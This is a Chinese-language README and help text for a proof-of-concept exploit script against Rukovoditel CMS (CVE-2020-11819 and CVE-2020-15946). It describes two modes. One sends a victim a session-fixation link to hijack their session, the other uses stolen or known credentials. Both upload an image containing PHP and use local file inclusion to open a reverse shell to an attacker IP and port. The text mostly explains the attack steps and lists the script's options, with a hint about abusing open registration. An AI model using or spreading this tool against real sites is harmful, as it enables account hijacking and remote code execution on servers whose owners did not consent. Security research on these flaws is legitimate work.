针对 CVE-2020-11819 和 CVE-2020-15946 的概念验证。已在 Rukovoditel 2.4.x、2.5.x 和 2.6.1 上测试。
此漏洞利用工具有两种执行模式:一种是利用会话固定漏洞(CVE-2020-15946),另一种是利用任意配置文件下任意账户的访问凭据。 使用 --type L 选项时,该脚本会创建一个恶意链接,如果受害者在浏览器中访问该链接,将设置一个任意的会话标识符,用于在其头像上传带有 PHP 内容的图片后窃取其会话,然后利用本地文件包含(CVE-2020-11819)获得一个反向 shell;或者,使用 --type C -u -p 选项提供凭据,加载带有 PHP 内容的图片,并利用本地文件包含(CVE-2020-11819)实现代码执行。
小提示:记得检查注册模块是否已启用 ;)
exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]
Rukovoditel 认证后 RCE 脚本,版本 1.0
可选参数:
-h, --help 显示此帮助信息并退出
-t URL, --target URL CMS Rukovoditel 的 URL/完整路径 http://url/path/to/cms/
-u USER, --user USER 用于认证的用户名
-p PASSWORD, --password PASSWORD 用于认证的密码
-a TYPE, --type TYPE 使用 -a L 生成链接并窃取会话,或使用 -a C(如果您拥有 Web 应用程序的访问凭据)
--ip IP_ATTACKER 用于反向 shell 的攻击者 IP!
--port PORT_ATTACKER 反向 shell 连接端口
--proxy PROXY 设置用于调试的 http 代理 http://127.0.0.1:8080